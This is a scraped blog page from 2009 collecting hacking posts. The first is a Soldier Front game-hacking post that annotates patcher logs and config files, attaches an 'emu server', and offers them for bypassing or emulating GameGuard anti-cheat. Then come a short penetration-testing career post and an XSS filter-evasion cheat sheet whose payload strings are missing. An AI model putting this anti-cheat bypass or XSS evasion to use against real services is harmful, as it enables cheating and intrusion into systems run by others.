force_007.sff,                 1552052578,16138304, 9221610,  20080311-161122
force_006.sff,                 57392645, 640433,   353754,   20080201-110344
force_005.sff,                 22656488, 255855,   55224,    20080204-113610
force_004.sff,                 107382726,1262695,  651875,   20071211-152448
force_003.sff,                 151358472,1380541,  1023891,  20071008-102356
force_002.sff,                 22185361, 213795,   106549,   20070712-125220
force_001.sff,                 -181145931,41968009, 23988072, 20060628-135914
force_017.sff,                 10405098, 107079,   54509,    20081010-153432
force_012.sff,                 1000791991,9738970,  5904717,  20080624-105709
force_013.sff,                 890902,   9446,     1677,     20080709-104429
force_014.sff,                 146776134,1683329,  891532,   20080718-102321
force_015.sff,                 21620293, 237024,   107510,   20080825-102311
force_016.sff,                 57006727, 577913,   288534,   20080922-114056
force_018.sff,                 463521833,5020588,  2803425,  20081030-211807
force_020.sff,                 8531505,  120992,   18947,    20081002-183432
force_021.sff,                 7185400,  79952,    38348,    20081014-123109
force_019.sff,                 171949948,1784532,  1060547,  20081124-154954
force_011.sff,                 1058004375,10290717, 6542236,  20080527-233819
 
 
/u_sf/data/lobby
lobbydata33.mrg,               2016446447,16083552, 2759485,  20080124-110718
lobbydata23.mrg,               945314,   4879,     1211,     20070919-110102
lobbydata34.mrg,               743268192,5239571,  679553,   20080212-164704
lobbydata32.mrg,               675337549,5161732,  908191,   20080109-151252
lobbydata31.mrg,               290837148,2015812,  540804,   20080104-202458
lobbydata30.mrg,               767612555,5186244,  2596702,  20071218-144052
lobbydata17.mrg,               536006423,3159379,  1072839,  20070621-103500
lobbydata18.mrg,               9631021,  73540,    18777,    20070627-175658
lobbydata28.mrg,               299078031,2018082,  763110,   20071127-174122
lobbydata43.mrg,               771047287,5379638,  881142,   20080825-102308
lobbydata26.mrg,               38058529, 253818,   57783,    20071023-113306
lobbydata25.mrg,               296928285,2015812,  671318,   20071016-102308
lobbydata24.mrg,               29482028, 215120,   65372,    20071008-102356
lobbydata22.mrg,               262494426,2015812,  708823,   20070831-160452
lobbydata21.mrg,               7594902,  53440,    12675,    20070801-191330
lobbydata20.mrg,               372727,   1784,     821,      20070724-180928
lobbydata2.mrg,                376410421,3168166,  390027,   20061102-173734
lobbydata19.mrg,               2407222,  16580,    2005,     20070712-125724
lobbydata29.mrg,               360402845,2489745,  699169,   20071211-152450
lobbydata42.mrg,               436062428,2888870,  655502,   20080718-102320
lobbydata14.mrg,               759096975,5705673,  1115770,  20070521-170906
lobbydata45.mrg,               16185795, 116742,   58109,    20081010-153432
lobbydata44.mrg,               390561560,2689951,  941237,   20080922-235357
lobbydata27.mrg,               651819467,5169641,  1289698,  20071114-165336
lobbydata16.mrg,               416221766,3170436,  354756,   20070612-173730
lobbydata41.mrg,               802470296,5525970,  923110,   20080624-105702
lobbydata40.mrg,               976147441,6786738,  892461,   20080527-233817
lobbydata4.mrg,                809287,   4582,     1313,     20061115-120400
lobbydata39.mrg,               377743561,2620822,  864346,   20080424-225259
lobbydata35.mrg,               222832223,1582797,  181708,   20080201-110344
lobbydata38.mrg,               54813103, 442756,   278390,   20080331-135210
lobbydata37.mrg,               508844564,3599202,  441691,   20080325-135212
lobbydata1.mrg,                -1264129724,21233249, 4491247,  20061017-194750
lobbydata10.mrg,               413114057,3146944,  340270,   20070320-181442
lobbydata3.mrg,                658788772,5182637,  857525,   20061108-164638
lobbydata11.mrg,               229417753,1622404,  348502,   20070411-173658
lobbydata12.mrg,               280942,   1365,     719,      20070411-175534
lobbydata13.mrg,               71354648, 540758,   127607,   20070504-155950
lobbydata36.mrg,               289879671,2015812,  432304,   20080311-161122
lobbydata15.mrg,               3622036,  26141,    10550,    20070608-092610
lobbydata6.mrg,                6672578,  50271,    2188,     20070104-151804
lobbydata5.mrg,                717878850,5181283,  1019447,  20061220-170144
lobbydata48.mrg,               303578235,2117923,  673480,   20081014-123108
lobbydata47.mrg,               807338526,5646522,  2231844,  20081124-154951
lobbydata46.mrg,               1690312008,11276735, 3601398,  20081030-211806
lobbydata7.mrg,                207305,   1019,     620,      20070123-134458
lobbydata8.mrg,                340467,   1710,     993,      20070205-195056
patchlog.log,                  212,      6,        130,      20081002-181029
sf_curse.drk,                  825938,   11711,    2575,     20061103-165308
pure.drk,                      193682,   1416,     872,      20040630-174314
notice.txt,                    110820,   1273,     777,      20081009-140005
lobbydata9.mrg,                631355,   3526,     1146,     20070212-212422
 
 
/u_sf/data/menu
menu_016.sff,                  5554440,  98500,    8421,     20071211-152448
menu_027.sff,                  51839415, 361580,   58039,    20081124-154950
menu_026.sff,                  15266890, 337160,   74512,    20081030-211803
menu_025.sff,                  8580108,  180790,   38343,    20081010-153432
menu_024.sff,                  450964257,3472493,  2714573,  20080922-114055
menu_023.sff,                  295870066,2290232,  1197935,  20080825-102306
menu_008.sff,                  7467119,  103876,   7429,     20070307-113458
menu_021.sff,                  25823987, 180792,   22082,    20080624-105702
menu_020.sff,                  26008759, 197368,   25692,    20080424-225259
menu_019.sff,                  2209158,  33936,    11912,    20080201-110344
menu_018.sff,                  4222059,  191992,   14068,    20080204-113610
menu_017.sff,                  1620406052,12602120, 11886079, 20080124-110718
menu_028.sff,                  1770498283,15219325, 12850636, 20081014-123108
menu_022.sff,                  25692931, 180792,   28922,    20080718-102319
menu_002.sff,                  1273820467,10024564, 9482189,  20061102-152156
menu_014.sff,                  78926376, 630417,   609812,   20071023-113306
menu_013.sff,                  102135280,873192,   214732,   20071008-102356
menu_012.sff,                  25431987, 180792,   26348,    20070712-125316
menu_011.sff,                  64474075, 1060804,  24090,    20070621-103404
menu_009.sff,                  12295773, 66260,    9290,     20070328-110516
menu_007.sff,                  77121030, 492640,   74728,    20070213-122442
menu_006.sff,                  18951713, 164216,   27909,    20070205-160120
menu_005.sff,                  20244639, 98848,    3910,     20070108-194944
menu_004.sff,                  1272170947,10003071, 9607062,  20061227-182018
menu_003.sff,                  1242291073,9675547,  9441139,  20061116-210124
menu_015.sff,                  83227843, 652823,   631706,   20071114-165336
menu_001.sff,                  -2046088635,22684136, 15169697, 20061017-164920
 
 
/u_sf/data/save
savereadme.txt,                1856,     24,       152,      20060403-164502
 
 
/u_sf/data/scr
scr_001.sff,                   147945064,925523,   259663,   20081014-123108
 
 
/u_sf/data/screenshot
shotreadme.txt,                2266,     27,       155,      20060403-164522
 
 
/u_sf/data/sound
sound_010.sff,                 18140564, 143906,   99452,    20080624-105703
sound_016.sff,                 14586589, 111826,   89045,    20081014-123109
sound_005.sff,                 21292383, 176088,   170476,   20061212-161740
sound_006.sff,                 20612563, 182351,   163369,   20070328-110600
sound_007.sff,                 21290561, 176925,   137170,   20070712-125504
sound_004.sff,                 107385086,883501,   849260,   20061108-150556
sound_015.sff,                 14980831, 121336,   70809,    20081124-154953
sound_014.sff,                 25434910, 169124,   99281,    20081030-211806
sound_013.sff,                 38838015, 245256,   155448,   20080918-111056
sound_008.sff,                 39187553, 323109,   314204,   20071023-113306
sound_009.sff,                 9442456,  80342,    65082,    20080424-225259
sound_003.sff,                 92021964, 772707,   629663,   20061031-194520
sound_002.sff,                 225269683,1951937,  1733425,  20060906-154850
sound_001.sff,                 -2119502634,17655980, 15102608, 20060403-164254
sound_012.sff,                 36453582, 295966,   208893,   20080825-102311
sound_011.sff,                 43945887, 370783,   205354,   20080718-102320
 
 
/u_sf/data/weapon
weapon_007.sff,                302252859,2867816,  1745791,  20080922-114056
weapon_006.sff,                109226159,1078459,  623795,   20080820-121816
weapon_001.sff,                -2004935247,22128641, 13509239, 20060403-164348
weapon_002.sff,                80548881, 784772,   422009,   20070712-125552
weapon_005.sff,                56663656, 554351,   349914,   20080711-111437
weapon_003.sff,                53861086, 535052,   308134,   20080418-124838
weapon_004.sff,                52072675, 515669,   316501,   20080619-104829
weapon_011.sff,                58479264, 545049,   370186,   20081002-185458
weapon_010.sff,                194290321,1823110,  1218500,  20081124-154954
weapon_009.sff,                195424374,1623153,  1243438,  20081022-031542
weapon_008.sff,                122258503,1209344,  715331,   20081006-230647
 
 
/u_sf/redist
mssvoice.asi,                  23130939, 214528,   116863,   20041210-233742
msssoft.m3d,                   7613837,  79360,    45180,    20041210-233626
mssrsx.m3d,                    39669920, 372224,   221493,   20041210-233632
mssmp3.asi,                    13821001, 149504,   75538,    20041210-233624
msseax.m3d,                    13245737, 143872,   68195,    20041210-233628
mssdx7.m3d,                    6138108,  65536,    30863,    20041210-233630
mssdsp.flt,                    10707007, 113664,   58526,    20041210-233532
mssds3d.m3d,                   5215788,  56320,    28616,    20041210-233630
mssa3d.m3d,                    6529387,  72704,    38467,    20041210-233632
 
 
/xfire //HERE xfire
xfire_installer_24715.soldierfront.exe,306197609,2417720,  2391082,  20070612-115632
 
[uninstall]
 
<EOF>
//PROCESS::ALLPREPATCH HERE~

//Fonction To get Wnd (WINDOW) Find Purple Folder

[CPurpleMessenger::FindPurpleWnd]

Succeeded to get hwnd = 2359400

//Display PAtch Updates (IN MODE=0)

[WndProc]TID_DISPLAY_PREPATCH_PROC

[PrePatchProc]Mode = 0


//HUL SERVER EMULATION

[GET_GAME_INFO]Patch method is hul

[SET_ROOT_FOLDER]m_szRegKeyInstall = SOFTWARE\Dragonfly\soldierfront

[SET_ROOT_FOLDER]m_szRegValuePath = installPath

[SET_ROOT_FOLDER]Trim Right

[SET_ROOT_FOLDER]Succeeded to query value = installPath

[SET_ROOT_FOLDER]Install path = C:\ijji\ENGLISH

[DOWNLOAD_HUL]Start

[DOWNLOAD_HUL]Hul Directory = C:\Documents and Settings\me\Application Data\ijjigame\HUL

[DOWNLOAD_HUL]Succeeded to delete Hul = C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...ewhul/u_sf.hul ]->[ C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul ]


[DOWNLOAD_HUL]End.


//PARSING FILES TO GET
[PARSING_HUL]Start.
[PARSING_HUL]End.

//CHECK IT
[CHECK_LOCAL_FILES]Start.
[CHECK_LOCAL_FILES]End.

//DO PATCH & INSTALL UTILITIES
[DO_PATCH]Start.

[DO_PATCH]Need to patch.

//IJJI SF UNINSTALL
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nstall.exe.zip ]->[ C:\ijji\ENGLISH\ijjiuninstall.exe.zip ]

//LOBBY FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...data39.mrg.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\lobby\lobbydata39.mrg.z ip ]

//MENU FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nu_020.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\menu\menu_020.sff.zip ]

//SOUNDS FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nd_009.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\sound\sound_009.sff.zip ]

//XFIRE INSTALL FILES
[Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...rfront.exe.zip ]->[ C:\ijji\ENGLISH\\xfire\xfire_installer_24715.soldi erfront.exe.zip ]



[DO_PATCH]We don't need to patch.

[DO_PATCH]End.

//END PATCH & RESULT IN 1 ( BEcause Normaly it's start with 0 ) Duh./..


Result = 1


[CWorkerThread::WorkerThread]End

//{
bRet = 1
//}

//return;

[StartPatch] End


//////////////////////////END OUT BOUNDER///////////////////




ijjiPrePatch.txt
Code:
[17:34:07] START DoPrePatch
[17:34:07] [CWorkerThread::SetParam]Start
[17:34:07] [CWorkerThread::Start]Succeeded to create thread.
[17:34:07] [CPPImpl::DoPatching]Start!
[17:34:07] [CPPImpl::PARSE_GAMESTRING]Start
[17:34:07] [CPPImpl::REGISTER_PP_WNDCLASS]Start
[17:34:07] [CPPImpl::CREATE_PP_WINDOW]Start
[17:34:07] [CPPImpl::GET_GAME_INFO]Start.
[17:34:07] [CPPImpl::GET_GAME_INFO]_sLocPPInfoFileName = [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini], _sSvrPPInfoFileName = [http://cdn.ijjimax.com/nhnusa/games/arcade/purple/plii/u_sf/u_sf_ppinfo.ini]
[17:34:07] [CPPImpl::GET_GAME_INFO]Succeeded to delete [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini]
[17:34:08] [CPPImpl::GET_GAME_INFO]Download common cfg.
[17:34:08] [CPPImpl::GET_GAME_INFO]Download [http://cdn.ijjimax.com/nhnusa/games/arcade/purple/plii/common/cfg/pp_config.ini] to [C:\DOCUME~1\me\LOCALS~1\Temp\\pp_config.ini].
[17:34:08] [CPPImpl::GET_GAME_INFO]End.
[17:34:08] [CPPImpl::SET_ROOT_FOLDER]Start
[17:34:08] [CPPImpl::SET_ROOT_FOLDER]Trim Right
[17:34:08] [CPPImpl::SET_ROOT_FOLDER]Succeeded to get installpath [C:\ijji\ENGLISH]
[17:34:08] [CPPImpl::GET_PP_VERSION]Start
[17:34:08] [CPPImpl::GET_PP_VERSION]_sLocHgverFilename = [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf.pv], _sSvrHgverFilename = [http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/prepatch/u_sf.pv]
[17:34:08] [CPPImpl::GET_PP_VERSION]Succeeded to download prepatch version
[17:34:08] [CPPImpl::GET_PP_VERSION]Succeeded to read prepatch version [1003]
[17:34:08] [CPPImpl::GET_PP_VERSION]_sLocHgverFilename = [C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf.cv], _sSvrHgverFilename = [http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/patch/u_sf.cv]
[17:34:08] [CPPImpl::GET_PP_VERSION]Succeeded to read current version [1003]
[17:34:08] [CPPImpl::GET_PP_VERSION]PrePatchVersion: 1003, CurrentVersion : 1003
[17:34:08] [CPPImpl::DO_PRE_PATCH]Start
[17:34:08] [CPPImpl::DO_PRE_PATCH]Local pre-patch file [C:\Documents and Settings\me\Application Data\ijjigame\u_sf_1003.pfile]
[17:34:08] [CPPImpl::DO_PRE_PATCH]The pre-patch version is same with current version.
[17:34:08] [CPPImpl::DO_PRE_PATCH]The pre-patch file is not downloaded. Do nothing.
[17:34:08] [CPPImpl::DoPatching]Complete Prepatch
[17:34:08] [CPPImpl::POST_COMPLETE_PREPATCH]Code = [0]
//PROCESSED PREPATCH


ijjiPurpleOutBounder.txt
Code:
[17:34:07] START Purple OutBound
[17:34:07] [SUCCESS]Mutex Check
[17:34:07] [SUCCESS]Get command line
[17:34:07] [SUCCESS]Parse command line
[17:34:07] [CPurpleMessenger::FindPurpleWnd]Succeeded to get hwnd = 2359400
[17:34:07] Start pre-patch proc
[17:34:07] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:07] [PrePatchProc]Mode = 0
[17:34:07] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:07] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]TID_DISPLAY_PREPATCH_PROC
[17:34:08] [PrePatchProc]Mode = 0
[17:34:08] [WndProc]UWM_PREPATCH_DONE
[17:34:08] [StartPatch]Start
[17:34:08] [CWorkerThread::Start]Start
[17:34:08] [CWorkerThread::Start]Succeeded to create thread
[17:34:08] [CWorkerThread::WorkerThread]Start
[17:34:08] [CPurpleMessenger::FindPurpleWnd]Succeeded to get hwnd = 2359400
[17:34:08] [GET_GAME_INFO]GameId = u_sf
[17:34:08] [GET_GAME_INFO]_sLocPPInfoFileName = C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini
[17:34:08] [GET_GAME_INFO]_sSvrPPInfoFileName = http://cdn.ijjimax.com/nhnusa/games/..._sf_ppinfo.ini
[17:34:08] [GET_GAME_INFO]Succeeded to delete C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini
[17:34:08] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/..._sf_ppinfo.ini ]->[ C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini ]
[17:34:08] [GET_GAME_INFO]Succeeded to download http://cdn.ijjimax.com/nhnusa/games/..._sf_ppinfo.ini to C:\DOCUME~1\me\LOCALS~1\Temp\\u_sf_ppinfo.ini
[17:34:08] [GET_GAME_INFO]Patch method is hul   //METHOD HUL (SERVER EMU TO REGISTERY)
[17:34:08] [SET_ROOT_FOLDER]m_szRegKeyInstall = SOFTWARE\Dragonfly\soldierfront
[17:34:08] [SET_ROOT_FOLDER]m_szRegValuePath = installPath //INSTALL REG
[17:34:08] [SET_ROOT_FOLDER]Trim Right
[17:34:08] [SET_ROOT_FOLDER]Succeeded to query value = installPath
[17:34:08] [SET_ROOT_FOLDER]Install path = C:\ijji\ENGLISH
[17:34:08] [DOWNLOAD_HUL]Start
[17:34:08] [DOWNLOAD_HUL]Hul Directory = C:\Documents and Settings\me\Application Data\ijjigame\HUL //PATH TO HUL DIRECTORY 
[17:34:08] [DOWNLOAD_HUL]Succeeded to delete Hul = C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul
[17:34:08] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...ewhul/u_sf.hul ]->[ C:\Documents and Settings\me\Application Data\ijjigame\HUL\u_sf.hul ]
[17:34:09] [DOWNLOAD_HUL]End.
[17:34:09] [PARSING_HUL]Start.
[17:34:09] [PARSING_HUL]End.
[17:34:09] [CHECK_LOCAL_FILES]Start.
[17:34:10] [CHECK_LOCAL_FILES]End.
[17:34:10] [DO_PATCH]Start.
[17:34:10] [DO_PATCH]Need to patch.
[17:34:10] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nstall.exe.zip ]->[ C:\ijji\ENGLISH\ijjiuninstall.exe.zip ]
[17:34:11] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...data39.mrg.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\lobby\lobbydata39.mrg.zip ]
[17:34:19] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nu_020.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\menu\menu_020.sff.zip ]
[17:34:19] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...nd_009.sff.zip ]->[ C:\ijji\ENGLISH\\u_sf\data\sound\sound_009.sff.zip ]
[17:34:20] [Util::DownloadFile] [ http://cdn.ijjimax.com/nhnusa/games/...rfront.exe.zip ]->[ C:\ijji\ENGLISH\\xfire\xfire_installer_24715.soldierfront.exe.zip ]
[17:34:41] [DO_PATCH]We don't need to patch.
[17:34:41] [DO_PATCH]End. Result = 1
[17:34:41] [CWorkerThread::WorkerThread]End bRet = 1
[17:34:41] [StartPatch]End
[17:34:41] End of ijjiPurpleOutBounder


//////////////////////Beanlog/////////////////////////////////
-----------------------Start--------------------------------------
The BEanlog tells To create the POinter Window 120284.
Using NB Mode.
///////////////////////////////////////
To this Fonction.
CPBUploadMgr::Work() start

Now After the game mode Placed.

try GETFILE::u_sf_1003.pfile

CPBUploadMgr::Work() End
//////////////////////////////////////
CPBUploadMgr thread Terminated
CPurpleBean thread Terminated

ReleaseSDK()

~CPBGameInfo()
--------------END---------------------


Beanlog.txt
Code:
[17:34:42] [DEBUG] Create Window... 120284
[17:34:42] [INFO] Use NB Mode
[17:34:44] [DEBUG] CPBUploadMgr::Work()... Begin
[17:34:44] [INFO] Try to find out process...
[17:36:14] [INFO] Success... find out process
[17:36:14] [INFO] AfterGame mode
[17:36:14] [INFO] Waitting for terminate process...
[17:37:55] [INFO] Process terminated in AfterGame mode, so start upload logic. 
[17:37:55] [INFO] Find out file in default path
[17:37:55] [INFO] Can't find out file in default path... C:\Documents and Settings\me\Application Data\ijjigame\u_sf_1003.pfile
[17:37:55] [INFO] Start Uploading.. : C:\Documents and Settings\me\Application Data\ijjigame\U_SFInstaller.exe
[17:37:55] [DEBUG] CPBUploadMgr::Work()... End
[17:38:10] [DEBUG] CPBUploadMgr thread Terminated..
[17:38:10] [INFO] CPurpleBean thread Terminated..
[17:38:13] [DEBUG] ReleaseSDK()..
[17:38:13] [DEBUG] ~CPBGameInfo()..

MyPurpleLog.c
Code:
[17:34:03] [WARNING] Fail to download cipher text. error code = -12147. Try to download plain text.
[17:34:03] [WARNING] There is no setting::ui tag. Default value "core" applied
[17:34:03] [INFORM] Analyze Param Ended
[17:34:04] [WARNING] There is no background filename in ui::background. Default image will be used.
[17:34:04] [INFORM] Create window Ended
[17:34:04] [INFORM] common module manager started
[17:34:04] [INFORM] full environment path = C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\system32\WBEM;C:\WINDOWS.000;C:\WINDOWS.000\COMMAND;C:\ijji\ENGLISH
[17:34:04] [INFORM] dll path = C:\ijji\ENGLISH
[17:34:04] [INFORM] RPC : OnInitialize
[17:34:05] [INFORM] RPC : interface calling is ended. result of CheckSFInstall is 3
[17:34:06] [INFORM] RPC : interface calling is ended. result of ijjiPurplePlugin_Execute is 1
[17:34:06] [INFORM] Show download Dialog
[17:34:07] [INFORM] Show html http://game.ijji.com/purplelauncher/...hn?gameId=u_sf
[17:34:07] [INFORM] Show update Dialog
[17:34:07] [INFORM] Updater Started
[17:34:07] [INFORM] RPC : OnMaintUIBefore
[17:34:41] [INFORM] Ready to Run Client
[17:34:41] [INFORM] Write Registry ended. Game update is finished
[17:34:41] [INFORM] RPC : interface calling is ended. result of LaunchBean is 3
[17:35:40] [INFORM] Execution has been succeeded!

ONLY FOR PRE-PATCH TO PATCH VERSION GAMES WDS
Like this fonction used in PurpleBean.exe:

[CPPImpl::GET_PP_VERSION]Start



-------->GET_PP_VERSION


_sLocHgverFilename
http://cdn.ijjimax.com/nhnusa/games/...epatch/u_sf.pv

-------->1004
*******************
All this upper GET this thing for c++ D3d_ASM emu


pp_config.ini
Code:
 
#FOR REAL
[CDN]
LIMIT = 420


_sLocHgverFilename
http://cdn.ijjimax.com/nhnusa/games/.../patch/u_sf.cv

-------->1003



All this upper GET this thing for c++ D3d_ASM emu


u_sf_ppinfo.ini
Code:
 
#PrePatch info.( FOR REAL SOLDIER FRONT)
[URLs]
PREPATCH  = http://cdn.ijjimax.com/nhnusa/games/.../U_SF/prepatch
PATCH   = http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/patch
CDNTRAFFIC = http://services.ijji.com/service/cdn/traffic
[Registry]
KEY_INSTALL = SOFTWARE\Dragonfly\soldierfront
VALUE_PATH  = installPath
[CDN]
#Unit - Megabits/sec
LIMIT  = 270
[Extend]
INSTALL_PATH_TRIM_RIGHT = 1
[Condition]
#0= none, 1 = File CheckSum, 2=Registry Check
OVERWRITECHECK = 0
#if OVERWRITECHECK 1 = File Name, 2=Registry Value Name
INFO = NULL
#if OVERWRITECHECK 1 = CheckSum Value, 2=Registry Value
VALUE = 0
[Patch]
# available values = hul, skip
METHOD = hul
[CPPImpl::DoPatching]Complete Prepatch

[CPPImpl::POST_COMPLETE_PREPATCH] Code = [0]
_______________________________
Succeeded to download prepatch version

//lobbydata39.mrg
File attached

/////////////////////////////////////////////////////////////////

--- CDN TRAFFIC BY MITCH1490 ---

////////////////////////////////////////////////////////////////

//ALL PRE-PATCH & PATCH & CDN TRAFFIC EMU

[URLs]
PREPATCH = http://cdn.ijjimax.com/nhnusa/games/.../U_SF/prepatch
PATCH = http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/patch
CDNTRAFFIC = http://services.ijji.com/service/cdn/traffic

//INSTALL REG PATH

[Registry]
KEY_INSTALL = SOFTWARE\Dragonfly\soldierfront
VALUE_PATH = installPath

//CDN MEAN THE NETWORK LIMIT PING

[CDN]
#Unit - Megabits/sec
LIMIT = 270

//TRIM PATH

[Extend]
INSTALL_PATH_TRIM_RIGHT = 1 //ONE MEANS ENABLED

//MANAGE UR REG

[Condition]
#0= none, 1 = File CheckSum, 2=Registry Check
OVERWRITECHECK = 0

#if OVERWRITECHECK 1 = File Name, 2=Registry Value Name
INFO = NULL

#if OVERWRITECHECK 1 = CheckSum Value, 2=Registry Value
VALUE = 0


//YOU HAVE CHOISES TO EMULATE SERVER HUL OR ONLY SKIP.

[Patch]
# available values = hul, skip
METHOD = hul

/////////////////////////////////////////////////////////END/////////////////////////////////////////////////////////////

After looking and searching in thoses folders You can simply know what The GameGuard Emulation is Searching and Checking that the Files are all the same Format as coming from the IJJI server.

You HAve Different WAys Of going in this To Bypass|Emulate" Enabled with knowledge.

Have a nice DAy.

If I helped you in somehow pleaze hit the thanks button.
_____________________________________________
Peace,
Mitch1490 ^_^

CReditz to Myself.

La PsyCadely Du Violet.
Attached Files
File Type: zip purple.zip (3.2 KB, 75 views)
File Type: zip lobbydata39.mrg.zip (844.1 KB, 75 views)
File Type: zip EMU SERVER.zip (930.5 KB, 98 views)
Last edited by Carbone14; 01-21-2009 at 02:16 PM. Reason: Added Purple Folder to path includes.

'Hacking' 카테고리의 다른 글

MS IE Internet Explorer Two Code Execution Vulnerabilities  (0) 2009.02.11
Technical Server Problem in Soldier Front By Mitch1490  (0) 2009.02.10
How to be penetration tester? (Computer Security Specialist?)  (0) 2009.02.08
XSS Cheat Sheet  (0) 2009.02.06
CIS benchmarks  (0) 2009.02.06
Posted by CEOinIRVINE
l

How to be penetration tester? (Computer Security Specialist?)

Hacking 2009. 2. 8. 16:01

I have decided to keep my originality about all postings here. Internet is such a nice place to find information and share knowledge. I completely agree with that. However, sometimes I feel so bad that I don't write anything about my postings when I just copied and pasted somebody's useful information/postings.

At this posting, I would like to cover how to start as web penetration tester and how to be recognized by other professionals in same field.

First of all, I recommend you to visit OWASP web page.
(the free and open application security community)


http://www.owasp.org/index.php/Main_Page


And then, please visit following website for getting security basic information.

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

Just download that project and unzip it.
You can find a lot of cheat sheets over there.
Those are very useful information for starter/beginner/wanna be security-professional.


After that, I would be SED/AWK guru who can analyze logs shortly.
That's the best way for you to get recognition from others.
They will respect you after noticing your fantastic analyzing and solving issues skills.


counterhacker@gmail.com

'Hacking' 카테고리의 다른 글

Technical Server Problem in Soldier Front By Mitch1490  (0) 2009.02.10
SF Hacking (Purple Folder)  (1) 2009.02.10
XSS Cheat Sheet  (0) 2009.02.06
CIS benchmarks  (0) 2009.02.06
Below is a list of resources you've selected:  (0) 2009.02.06
Posted by CEOinIRVINE
l

XSS Cheat Sheet

Hacking 2009. 2. 6. 09:41

XSS (Cross Site Scripting) Cheat Sheet
Esp: for filter evasion


By RSnake

Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum:

Web Application Security RSS feed


XSS (Cross Site Scripting):
    XSS locator. Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use the URL encoding calculator below to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    XSS locator 2. If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS verses &lt;XSS to see if it is vulnerable:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well - I'll probably revise this at a later date):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    No quotes and no semicolon:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Case insensitive XSS attack vector:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    HTML entities (the semicolons are required for this to work):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


